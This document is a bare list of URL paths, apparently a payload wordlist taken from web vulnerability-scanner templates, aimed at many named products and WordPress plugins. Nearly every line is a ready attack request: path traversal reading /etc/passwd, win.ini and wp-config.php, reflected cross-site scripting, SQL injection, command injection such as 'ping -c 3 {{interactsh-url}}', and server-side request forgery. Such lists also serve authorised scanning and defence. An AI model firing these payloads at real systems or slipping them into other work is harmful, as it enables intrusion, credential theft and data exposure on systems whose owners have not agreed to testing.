/install/app.php
/index.php?page=install
/setup/index.php
/install.php?a=check
/password-page/ovf/account-credentials-ovf
/admin/install/server
/setup/license
/install/make-config.php
/adminweb/
/admin/wizard.jsp
/sabnzbd/wizard/
/wizard/
/api/system/options/core.email
/public/recovery/install/index.php
/ecrire/?exec=install
/install/index.html
/welcome
/index.php?/installer
/wizardset.htm
/easy_setup.htm
/admin/install/install.php
/umbraco/management/api/v1/server/status
/manage/wizard/
/#welcome
/install/information/database
/index.php?module=Install&view=Index
/application/install/index.php
/zc_install/index.php
/UI/Dashboard
/jackett/UI/Dashboard
/kafka/clusters
/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
/v2/keys/
/ADSearch.cc?methodToCall=search
/mem_tracker
/ajax-api/2.0/preview/mlflow/experiments/get?experiment_id=0
/recent_scans/
/wizard.htm
/debug/
/config/pw_left_bar.html
/_debugbar/open
/applications.pinpoint
/config
/node_modules/mqtt/test/helpers/
/api/v1/status/config
/?pp=env
/#!/printer/Prusa_I3/print
/home/000~ROOT~000/etc/passwd
/000~ROOT~000/etc/passwd
/OLDS/home/000~ROOT~000/etc/passwd
/app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd
/searchreplacedb2.php
/actpt_5g.data
/wd/hub
/#/dashboards
/_vti_pvt/service.pwd
/login.do?jvar_page_title=<style><foo>Injected Title</foo></style>
/web/admin/setup
/Portal0000.htm
/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml
/index.php?s=/install/index/index
/Admin/frmWelcome.aspx
/cgi-bin/GetSrvInfo.exe
/admin_dev.php
/index_dev.php
/app_dev.php
/graph
/classic/graph
/api/me
/home
/dashboard
/ckfinder/ckfinder.html
/#/devices
/upgrade.php
/settings/general
/collections
/favicon.ico
/api/v1/namespaces/default/workflows?query=
/wifi_base.shtml
/#/alerts
/backend/admin/users?username=anonymous
/Default.aspx
/mongo-express/
/db/admin/system.users
/sensorlist.htm
/data/plugins_listing
/config.json
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/.clean.sh
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
/ccm/system/panels/page/preview_as_user/preview?cID=
/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd
/plus/carbuyaction.php?dopost=return&code=../../
/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/cosmobdf.cgi?function=0
/cgi-bin/cosmobdf.cgi?function=1
/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql
/js/../.htpasswd
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg%2Bsrc%3Dx%20onerror%3Dalert(document.domain)%3E
/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E
/?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E
/api/model_report/file/download?index=/&ext=/etc/passwd
/portal/conf/config.properties
/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
/umweb/passwd
/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/./../../../../../../../../../../etc/passwd
/html/2word?url={{file}}
/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name={{file}}.txt
/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin
/en/WEB-INF/web.xml;.js
/jenkins/
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini
/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--
/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=
/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27
/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+
/_ignition/scripts/--><svg%20onload=alert(document.domain)>
/var/resource_config.json
/dev/tests/functional/credentials.xml.dist
/dev/tests/functional/etc/config.xml.dist
/RST_status.htm%00currentsetting.htm
/data/
/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=
/_nuxt/@fs/etc/passwd
/_nuxt/@fs/windows/win.ini
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/Electron/download/windows/..\..\..\Http\webroot\config.json
/Electron/download/windows/\windows\win.ini
/index.php?id=50&file=../../../../../../../../../etc/passwd
/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E
/images/../../../../../../../../etc/passwd
/fetchBody?id=1/../../../../../../../../etc/passwd
/downloadfile.php?file=../../../../../../../../../../etc/passwd
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/
/org_execl_download.action?filename=../../../../../../../../../../../../../etc/passwd
/download.action?filename=../../../../../../etc/passwd
/api/downloads?fileName=../../../../../../../../etc/passwd
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/download.php?file=../../../../../etc/passwd
/main/calendar/agenda_list.php?type=xss
/?{alert(document.domain)}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK
/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/password.cgi
/_users/_all_docs
/cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName
/api/file?path=../../etc/passwd
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/v12/setup/temp/admin.php
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
/api/v1/userlist?pageindex=0&pagesize=10
/application/down.php?dw=config/config.php
/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/cities?country=/../../../../../../../../etc/passwd
/casmain.xgi
/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/index.php?s=Admin-Data-down&id=../../Conf/config.php
/download.php?file=/etc/passwd
/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini
/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa
/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/compress.php?file=../../../../../../../etc/passwd
/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd
/dgn/dgn_tools/ping.php?ipdm=2;id;
/him/api/rest/V1.0/system/log/list?filePath=../
/download?type=files&filename=../../../../../../../../etc/passwd
/lib///....//....//....//....//....//....//....//....//etc//passwd
/fileDownload?action=downloadBackupFile
/interlib/report/ShowImage?localPath=etc/passwd
/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini
/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23
/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/
/topic/e
/api/image/cover-upload?filename=../appsettings.json
/appmonitor/protected/selector/server_file/files?folder=C://&suffix=
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
/htmltopdf/downfile.php?filename=/windows/win.ini
/downFile.php?filename=../../../../etc/passwd
/js/../../../../../../../../etc/passwd%00.jpg
/lucee/admin/web.cfm
/lucee/admin/server.cfm
/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/ftb.imagegallery.aspx
/Business/DownLoad.aspx?p=UploadFile/../Web.Config
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/msa/../../../../../../../../etc/passwd
/stat.jsp?cmd=chcp+437+%7c+dir
/include/thumb.php?dir=http/.....///.....///config/config_db.php
/include/thumb.php?dir=.....///http/.....///config/config_db.php
/include/thumb.php?dir=http\\..\\..\\config\\config_db.php
/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/file=C:%5CWindows%5Cwin.ini
/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini
/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId=
/developLog/downloadLog.php?name=../../../../etc/passwd
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
///////../../../etc/passwd
/static///////../../../../etc/passwd
///../app.js
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
/css_parser.php?css=css_parser.php
/static/css//../../../../../../../../etc/passwd
/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/client/cdnfile/1C/Windows/win.ini?windows
/client/cdnfile/C/etc/passwd?linux
/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E
/login.php/
/phpwiki/index.php/passwd
/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif={{rand_base(4)}}
/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/xml/User/User.xml
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
/?subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/%20../web-inf/
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
/resin-doc/viewfile/?file=index.jsp
/index.php?action=login.index
/report/download.php?pdf=../../../../../etc/passwd
/tmp/updateme/sinfor/ad/sys/sys_user.conf
/search.php?searchtype=5
/installed_emanual_down.html?path=/manual/../../../etc/passwd
/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E
/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7
/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7
/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7
/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7
/index.php?page=../../../../../../../../../../etc/passwd
/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/lan.html
/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?content=../../../../../../../../etc/passwd
/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/
/index.php?page=/etc/passwd
/api/manager/submit?group=1&username={{username}}&password={{password}}
/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/index.php/Home/uploadify/fileList?type=.+&path=../../../
/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/search?search_key=%7B%7B1337*1338%7D%7D
/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
/hoteldruid/inizio.php
/inizio.php
/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
/../../../../../../../../../../../etc/passwd
/jpeginfo/jpeginfo.php?url={{interactsh-url}}
/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}
/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd
/wt3/forceSave.php?file=/etc/passwd
/admin/group/x_group.php?id=1
/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8
/download.do?file=../../../../config.text
/(download)/etc/passwd
/%3Cscript%3Ealert(document.domain)%3C/script%3E
/ui/login.php?user=admin
/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)
/render.html?url=https://oast.live
/jolokia/list
/actuator/jolokia/list
/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/?a=display&templateFile=README.md
/password.htm
/arcade.php?act=Arcade&do=stats&comment=a&s_id=1
/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/eam/vib?id=/etc/passwd
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
/defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml
/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/mobile/plugin/CheckServer.jsp?type=mobileSetting
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes(
/Api/portal/elementEcodeAddon/getSqlData?sql=
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(
/mysql_config.ini
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp
/UserSelect/
/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/?aam-media=wp-config.php
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true
/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/setup-config.php?step=1
/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery
/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/?mdocs-img-preview=../../../wp-config.php
/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1
/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-includes/sym404/root/etc/passwd
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/
/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
/NCFindWeb?service=IPreAlertConfigService&filename=
/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/service/~baseapp/UploadServlet
/portal/file?cmd=getFileLocal&fileid=..%2F..%2F..%2F..%2Fwebapps/nc_web/WEB-INF/web.xml
/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js
/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
